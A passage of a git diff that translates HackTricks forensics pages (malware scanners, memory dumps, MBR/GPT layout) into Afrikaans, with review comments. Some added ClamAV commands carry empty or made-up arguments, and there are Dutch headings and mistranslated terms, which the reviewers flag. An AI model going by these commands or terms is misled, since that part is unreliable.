bestandsextensies van de scan met behulp van een lijst + +```bash +clamscan -r --exclude=".extensie" --exclude-from= / +``` + +#### Uitsluiten van specifieke bestandstypen van de scan met behulp van een lijst + +```bash +clamscan -r --exclude="type/bestand" --exclude-from= / +``` + +#### Uitsluiten van specifieke bestandskenmerken van de scan met behulp van een lijst + +```bash +clamscan -r --exclude="kenmerk" --exclude-from= / +``` + +#### Uitsluiten van specifieke bestandskenmerken van de scan met behulp van reguliere expressies in een lijst + +```bash +clamscan -r --exclude="regex:patroon" --exclude-from= / +``` ``` sudo apt-get install -y clamav ``` +#### Skandering -#### Scan +Om 'n malware-analise te begin, is dit belangrik om die betrokke stelsel te skandeer vir enige moontlike malware. Hier is 'n paar skanderingstegnieke wat gebruik kan word: +- **Antivirus-skandering**: Voer 'n volledige skandering uit met 'n betroubare antivirusprogram om enige bekende malware te identifiseer. +- **Rootkit-skandering**: Gebruik 'n spesialiteitstool om te soek na enige versteekte rootkits wat moontlik op die stelsel geïnstalleer kan wees. +- **Netwerkverkeersanalise**: Monitor die netwerkverkeer om enige verdagte aktiwiteit of ongewone patrone te identifiseer. +- **Bestandshashing**: Skep 'n hashtabel van alle lêers op die stelsel en vergelyk dit met 'n databasis van bekende skadelike lêers. +- **Geheue-analise**: Analiseer die stelsel se geheue vir enige verdagte prosesse of aktiwiteit. + +Dit is belangrik om 'n kombinasie van hierdie skanderingstegnieke te gebruik om 'n volledige prentjie van die stelsel se veiligheid te verkry. ```bash sudo freshclam #Update rules clamscan filepath #Scan 1 file clamscan folderpath #Scan the whole folder ``` - ### [Capa](https://github.com/mandiant/capa) -**Capa** detects potentially malicious **capabilities** in executables: PE, ELF, .NET. 
So it will find things such as Att\&ck tactics, or suspicious capabilities such as: +**Capa** ontdek potensieel skadelike **vermoëns** in uitvoerbare lêers: PE, ELF, .NET. Dit sal dinge soos Att\&ck-taktieke of verdagte vermoëns soos die volgende vind: -* check for OutputDebugString error -* run as a service -* create process +* kontroleer vir OutputDebugString-fout +* hardloop as 'n diens +* skep proses -Get it int he [**Github repo**](https://github.com/mandiant/capa). +Kry dit in die [**Github-opberging**](https://github.com/mandiant/capa). ### IOCs -IOC means Indicator Of Compromise. An IOC is a set of **conditions that identify** some potentially unwanted software or confirmed **malware**. Blue Teams use this kind of definition to **search for this kind of malicious files** in their **systems** and **networks**.\ -To share these definitions is very useful as when malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster. +IOC beteken Indicator Of Compromise. 'n IOC is 'n stel **voorwaardes wat** enige potensieel ongewenste sagteware of bevestigde **malware identifiseer**. Blou-spanne gebruik hierdie tipe definisie om hierdie soort skadelike lêers in hul stelsels en netwerke te **soek**.\ +Dit is baie nuttig om hierdie definisies te deel, want as malware in 'n rekenaar geïdentifiseer word en 'n IOC vir daardie malware geskep word, kan ander Blou-spanne dit gebruik om die malware vinniger te identifiseer. -A tool to create or modify IOCs is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ -You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**. 
+'n Hulpmiddel om IOCs te skep of te wysig is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ +Jy kan gereedskap soos [**Redline**](https://www.fireeye.com/services/freeware/redline.html) gebruik om gedefinieerde IOCs in 'n toestel te **soek**. ### Loki -[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\ -Detection is based on four detection methods: - +[**Loki**](https://github.com/Neo23x0/Loki) is 'n skandeerder vir Eenvoudige Indicators of Compromise.\ +Deteksie is gebaseer op vier deteksie-metodes: ``` 1. File Name IOC - Regex match on full file path/name +Regex match on full file path/name 2. Yara Rule Check - Yara signature matches on file data and process memory +Yara signature matches on file data and process memory 3. Hash Check - Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files - -4. C2 Back Connect Check - Compares process connection endpoints with C2 IOCs (new since version v.10) -``` +Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files +4. C2 Back Connect Check +Compares process connection endpoints with C2 IOCs (new since version v.10) +``` ### Linux Malware Detect -[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and malware community resources. +[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is 'n kwaadwillige skanderingstool vir Linux wat vrygestel is onder die GNU GPLv2-lisensie en ontwerp is vir die bedreigings wat in gedeelde gehoste omgewings voorkom. 
Dit maak gebruik van bedreigingsdata van netwerkrandindringingsdeteksiesisteme om aktief gebruikte kwaadware in aanvalle te onttrek en handtekeninge vir opsporing te genereer. Daarbenewens word bedreigingsdata ook afgelei van gebruikersinskrywings met die LMD-uitklooi-funksie en kwaadware-gemeenskapsbronne. ### rkhunter -Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check the filesystem for possible **rootkits** and malware. - +Hulpmiddels soos [**rkhunter**](http://rkhunter.sourceforge.net) kan gebruik word om die lêersisteem vir moontlike **rootkits** en kwaadware te ondersoek. ```bash sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress] ``` - ### FLOSS -[**FLOSS**](https://github.com/mandiant/flare-floss) is a tool that will try to find obfuscated strings inside executables using different techniques. +[**FLOSS**](https://github.com/mandiant/flare-floss) is 'n instrument wat sal probeer om versluierde strings binne uitvoerbare lêers te vind deur gebruik te maak van verskillende tegnieke. ### PEpper -[PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules). +[PEpper](https://github.com/Th3Hurrican3/PEpper) kontroleer sekere basiese dinge binne die uitvoerbare lêer (binêre data, entropie, URL's en IP-adresse, sekere yara-reëls). ### PEstudio -[PEstudio](https://www.winitor.com/download) is a tool that allows to get information of Windows executables such as imports, exports, headers, but also will check virus total and find potential Att\&ck techniques. +[PEstudio](https://www.winitor.com/download) is 'n instrument wat inligting oor Windows-uitvoerbare lêers kan verkry, soos invoer, uitvoer, koppe, maar dit sal ook virus totaal kontroleer en potensiële Att\&ck-tegnieke vind. 
### Detect It Easy(DiE) -[**DiE**](https://github.com/horsicq/Detect-It-Easy/) is a tool to detect if a file is **encrypted** and also find **packers**. +[**DiE**](https://github.com/horsicq/Detect-It-Easy/) is 'n instrument om te bepaal of 'n lêer **versleutel** is en ook om **pakkers** te vind. ### NeoPI -[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**. +[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) is 'n Python-skripsie wat verskeie **statistiese metodes** gebruik om **versluierde** en **versleutelde** inhoud binne teks-/skripslêers op te spoor. Die beoogde doel van NeoPI is om te help met die opsporing van verborge webshell-kode. ### **php-malware-finder** -[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells. +[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) doen sy uiterste bes om **versluierde**/**dodgy kode** asook lêers wat PHP-funksies gebruik wat dikwels in **malware**/webshells gebruik word, op te spoor. -### Apple Binary Signatures - -When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.** +### Apple Binêre Handtekeninge +Wanneer jy 'n **malware monster** ondersoek, moet jy altyd die handtekening van die binêre lêer **ondersoek**, aangesien die **ontwikkelaar** wat dit onderteken het, moontlik al verband hou met **malware**. ```bash #Get signer codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" 
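Review bot: the ClamAV section in this hunk adds a large block of content that is not a translation of the source and should be dropped: from `#### Bijwerken van de virusdefinities` onward the headings are Dutch rather than Afrikaans, and the commands carry empty or placeholder arguments (`clamscan -r --move= /`, `clamscan -r --exclude-from= /`, `clamscan -r --exclude=">grootte" /`) that will not run as written; the original `sudo apt-get install -y clamav` block is then left below it, so installation appears twice. The same applies to the two `#### Skandering` paragraphs (under Yara and under ClamAV), which are generic text the English source does not contain; a translation PR should only translate. Several terms are also mistranslated: "Opvangs Gereedskap" for "Detection Tools" (suggest "Opsporingsgereedskap"), "'n kwaadwillige skanderingstool" for "a malware scanner" (this reads as "a malicious scanning tool"; suggest "'n malware-skandeerder"), "LMD-uitklooi-funksie" for "LMD checkout feature", "Python-skripsie" (a thesis) for "Python script" (suggest "Python-skrip"), and "virus totaal" for VirusTotal, which is a product name and should stay as-is. Finally, the hunk removes the blank lines between headings and the ```bash fences (e.g. `#### Installeer` is immediately followed by the fence); keep them so the markdown renders as in the source.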
@@ -166,31 +279,30 @@ codesign --verify --verbose /Applications/Safari.app #Check if the signature is valid spctl --assess --verbose /Applications/Safari.app ``` +## Opsoektegnieke -## Detection Techniques +### Lêerstapel -### File Stacking +As jy weet dat 'n sekere **gids wat die lêers van 'n webbediener bevat, laas op 'n sekere datum opgedateer is**, **kontroleer** die **datum** waarop al die **lêers** in die webbediener geskep en gewysig is, en as enige datum **verdag voorkom**, kontroleer daardie lêer. -If you know that some folder containing the **files** of a web server was **last updated on some date**. **Check** the **date** all the **files** in the **web server were created and modified** and if any date is **suspicious**, check that file. +### Basiese lyn -### Baselines +As die lêers van 'n gids **nie gewysig behoort te wees nie**, kan jy die **hak** van die **oorspronklike lêers** van die gids bereken en dit **vergelyk** met die **huidige** lêers. Enige iets wat gewysig is, sal **verdag voorkom**. -If the files of a folder **shouldn't have been modified**, you can calculate the **hash** of the **original files** of the folder and **compare** them with the **current** ones. Anything modified will be **suspicious**. +### Statistiese analise -### Statistical Analysis - -When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a web shell might be one of the most**. +Wanneer die inligting in loglêers gestoor word, kan jy **statistieke soos hoeveel keer elke lêer van 'n webbediener as 'n webshell benader is**, nagaan.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
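Review bot: two headings in this hunk are mistranslated: `## Opsoektegnieke` for "Detection Techniques" should be `## Opsporingstegnieke`, and `### Basiese lyn` for "Baselines" should be `### Basislyne`. In the Baselines paragraph "die **hak** van die **oorspronklike lêers**" should keep the technical term, e.g. "die **hash** van die oorspronklike lêers", since "hak" is not used for a cryptographic hash. The first sentence under `### Lêerstapel` also mixes a subordinate clause with an imperative ("As jy weet dat 'n sekere **gids ... laas op 'n sekere datum opgedateer is**, **kontroleer** die **datum** ..."); suggest "As jy weet dat 'n gids ... laas op 'n sekere datum opgedateer is, kontroleer dan die datum waarop ...".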
diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md index 831a4438c..cfff56f5b 100644 --- a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md +++ b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md @@ -1,53 +1,53 @@ -# Memory dump analysis +# Geheue dump-analise
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %} -## Start +## Begin -Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md). +Begin met **soek na malware** binne die pcap. Gebruik die **gereedskap** wat genoem word in [**Malware-analise**](../malware-analysis.md). ## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md) -**Volatility is the main open-source framework for memory dump analysis**. This Python tool analyzes dumps from external sources or VMware VMs, identifying data like processes and passwords based on the dump's OS profile. It's extensible with plugins, making it highly versatile for forensic investigations. +**Volatility is die belangrikste oopbron-raamwerk vir geheue dump-analise**. Hierdie Python-gereedskap analiseer damps van eksterne bronne of VMware-VM's en identifiseer data soos prosesse en wagwoorde gebaseer op die dump se bedryfstelselprofiel. Dit is uitbreidbaar met plugins, wat dit baie veelsydig maak vir forensiese ondersoeke. 
-**[Find here a cheatsheet](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)** +**[Vind hier 'n spiekbrief](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)** -## Mini dump crash report +## Mini dump-ongelukverslag -When the dump is small (just some KB, maybe a few MB) then it's probably a mini dump crash report and not a memory dump. +Wanneer die dump klein is (net 'n paar KB, dalk 'n paar MB), is dit waarskynlik 'n mini dump-ongelukverslag en nie 'n geheue-dump nie. ![](<../../../.gitbook/assets/image (216).png>) -If you have Visual Studio installed, you can open this file and bind some basic information like process name, architecture, exception info and modules being executed: +As jy Visual Studio geïnstalleer het, kan jy hierdie lêer oopmaak en 'n paar basiese inligting soos prosesnaam, argitektuur, uitsonderingsinligting en uitgevoerde modules bind: ![](<../../../.gitbook/assets/image (217).png>) -You can also load the exception and see the decompiled instructions +Jy kan ook die uitsondering laai en die gedekompileerde instruksies sien ![](<../../../.gitbook/assets/image (219).png>) ![](<../../../.gitbook/assets/image (218) (1).png>) -Anyway, Visual Studio isn't the best tool to perform an analysis of the depth of the dump. +In elk geval is Visual Studio nie die beste gereedskap om 'n diepte-analise van die dump uit te voer nie. -You should **open** it using **IDA** or **Radare** to inspection it in **depth**. +Jy moet dit **oopmaak** met behulp van **IDA** of **Radare** om dit in **diepte** te ondersoek. @@ -55,18 +55,18 @@ You should **open** it using **IDA** or **Radare** to inspection it in **depth**
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
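Review bot: The translated footer renders the same fixed phrases differently across this patch, which should come from one template since it is repeated on every page: "Deel jou hacking-truuks" here, "hacktruuks" in the partitions README header and in file-data-carving-recovery-tools.md, and "haktruuks" in the README footer at the end of that file; likewise "PEASS & HackTricks swag" against "PEASS & HackTricks-uitrusting", and "github-repos" against "github-opslag". Pick one form for each and apply it to every copy. In this hunk "cybersecurity-maatskappy" also keeps the English word while the RootedCON sentence on the same line uses "kuberveiligheid"; "kuberveiligheidsmaatskappy" keeps the terminology consistent.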
diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md index e05337c43..3818d8ea5 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -1,161 +1,158 @@ -# Partitions/File Systems/Carving +# Partisies/ Lêersisteme/ Uitsnyding -## Partitions/File Systems/Carving +## Partisies/ Lêersisteme/ Uitsnyding
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Partitions +## Partisies -A hard drive or an **SSD disk can contain different partitions** with the goal of separating data physically.\ -The **minimum** unit of a disk is the **sector** (normally composed of 512B). So, each partition size needs to be multiple of that size. +'n Harde skyf of 'n **SSD-skyf kan verskillende partisies bevat** met die doel om data fisies te skei.\ +Die **minimum** eenheid van 'n skyf is die **sektor** (gewoonlik saamgestel uit 512B). Dus moet elke partisie grootte 'n veelvoud van daardie grootte wees. -### MBR (master Boot Record) +### MBR (Master Boot Record) -It's allocated in the **first sector of the disk after the 446B of the boot code**. This sector is essential to indicate to the PC what and from where a partition should be mounted.\ -It allows up to **4 partitions** (at most **just 1** can be active/**bootable**). However, if you need more partitions you can use **extended partitions**. The **final byte** of this first sector is the boot record signature **0x55AA**. Only one partition can be marked as active.\ -MBR allows **max 2.2TB**. +Dit word toegewys in die **eerste sektor van die skyf na die 446B van die opstartkode**. Hierdie sektor is noodsaaklik om aan die rekenaar aan te dui wat en waarvandaan 'n partisie gemonteer moet word.\ +Dit laat tot **4 partisies** toe (slegs **1** kan aktief/ opstartbaar wees). As jy egter meer partisies nodig het, kan jy **uitgebreide partisies** gebruik. Die **laaste byte** van hierdie eerste sektor is die opstartrekord-handtekening **0x55AA**. Slegs een partisie kan as aktief gemerk word.\ +MBR laat **maksimum 2.2TB** toe. ![](<../../../.gitbook/assets/image (489).png>) ![](<../../../.gitbook/assets/image (490).png>) -From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Signature** (if Windows is used). The logical drive letter of the hard disk depends on the Windows Disk Signature. 
Changing this signature could prevent Windows from booting (tool: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**. +Vanaf die **byte 440 tot 443** van die MBR kan jy die **Windows Disk Signature** vind (as Windows gebruik word). Die logiese aanduiding van die harde skyf hang af van die Windows Disk Signature. Die verandering van hierdie handtekening kan voorkom dat Windows opstart (hulpmiddel: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**. ![](<../../../.gitbook/assets/image (493).png>) -**Format** +**Formaat** -| Offset | Length | Item | +| Offset | Lengte | Item | | ----------- | ---------- | ------------------- | -| 0 (0x00) | 446(0x1BE) | Boot code | -| 446 (0x1BE) | 16 (0x10) | First Partition | -| 462 (0x1CE) | 16 (0x10) | Second Partition | -| 478 (0x1DE) | 16 (0x10) | Third Partition | -| 494 (0x1EE) | 16 (0x10) | Fourth Partition | -| 510 (0x1FE) | 2 (0x2) | Signature 0x55 0xAA | +| 0 (0x00) | 446(0x1BE) | Opstartkode | +| 446 (0x1BE) | 16 (0x10) | Eerste Partisie | +| 462 (0x1CE) | 16 (0x10) | Tweede Partisie | +| 478 (0x1DE) | 16 (0x10) | Derde Partisie | +| 494 (0x1EE) | 16 (0x10) | Vierde Partisie | +| 510 (0x1FE) | 2 (0x2) | Handtekening 0x55 0xAA | -**Partition Record Format** +**Partisie Rekord Formaat** -| Offset | Length | Item | +| Offset | Lengte | Item | | --------- | -------- | ------------------------------------------------------ | -| 0 (0x00) | 1 (0x01) | Active flag (0x80 = bootable) | -| 1 (0x01) | 1 (0x01) | Start head | -| 2 (0x02) | 1 (0x01) | Start sector (bits 0-5); upper bits of cylinder (6- 7) | -| 3 (0x03) | 1 (0x01) | Start cylinder lowest 8 bits | -| 4 (0x04) | 1 (0x01) | Partition type code (0x83 = Linux) | -| 5 (0x05) | 1 (0x01) | End head | -| 6 (0x06) | 1 (0x01) | End sector (bits 0-5); upper bits of cylinder (6- 7) | -| 7 (0x07) | 1 (0x01) | End cylinder lowest 8 bits | -| 8 (0x08) | 4 (0x04) | Sectors preceding partition (little endian) | -| 12 (0x0C) | 4 (0x04) | Sectors in 
partition | +| 0 (0x00) | 1 (0x01) | Aktiewe vlag (0x80 = opstartbaar) | +| 1 (0x01) | 1 (0x01) | Beginkop | +| 2 (0x02) | 1 (0x01) | Beginsektor (bits 0-5); boonste bits van silinder (6-7) | +| 3 (0x03) | 1 (0x01) | Begin silinder laagste 8 bits | +| 4 (0x04) | 1 (0x01) | Partisie tipe kode (0x83 = Linux) | +| 5 (0x05) | 1 (0x01) | Eindkop | +| 6 (0x06) | 1 (0x01) | Eindsektor (bits 0-5); boonste bits van silinder (6-7) | +| 7 (0x07) | 1 (0x01) | Eind silinder laagste 8 bits | +| 8 (0x08) | 4 (0x04) | Sektors voor partisie (little endian) | +| 12 (0x0C) | 4 (0x04) | Sektors in partisie | -In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command) +Om 'n MBR in Linux te monteer, moet jy eers die beginverskuiwing kry (jy kan `fdisk` en die `p`-opdrag gebruik) -![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>) - -And then use the following code +![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>) +En gebruik dan die volgende kode ```bash #Mount MBR in Linux mount -o ro,loop,offset= #63x512 = 32256Bytes mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/ ``` +**LBA (Logiese blokadressering)** -**LBA (Logical block addressing)** +**Logiese blokadressering** (**LBA**) is 'n algemene skema wat gebruik word om die ligging van blokke data op rekenaarstoorapparate, gewoonlik sekondêre stoorstelsels soos harde skywe, te spesifiseer. LBA is 'n besonder eenvoudige lineêre adresseringstelsel; blokke word geïdentifiseer deur 'n heelgetalindeks, waar die eerste blok LBA 0 is, die tweede LBA 1, en so aan. 
-**Logical block addressing** (**LBA**) is a common scheme used for **specifying the location of blocks** of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on. +### GPT (GUID-partisietabel) -### GPT (GUID Partition Table) +Die GUID-partisietabel, bekend as GPT, word verkies vir sy verbeterde vermoëns in vergelyking met MBR (Meester Opstartrekord). Kenmerkend vir sy unieke identifiseerder vir partisies, steek GPT uit op verskeie maniere: -The GUID Partition Table, known as GPT, is favored for its enhanced capabilities compared to MBR (Master Boot Record). Distinctive for its **globally unique identifier** for partitions, GPT stands out in several ways: +- **Ligging en Grootte**: Beide GPT en MBR begin by **sektor 0**. Tog werk GPT met **64-bits**, teenoor MBR se 32-bits. +- **Partisiebeperkings**: GPT ondersteun tot **128 partisies** op Windows-stelsels en kan tot **9.4ZB** data akkommodeer. +- **Partisienames**: Bied die vermoë om partisies 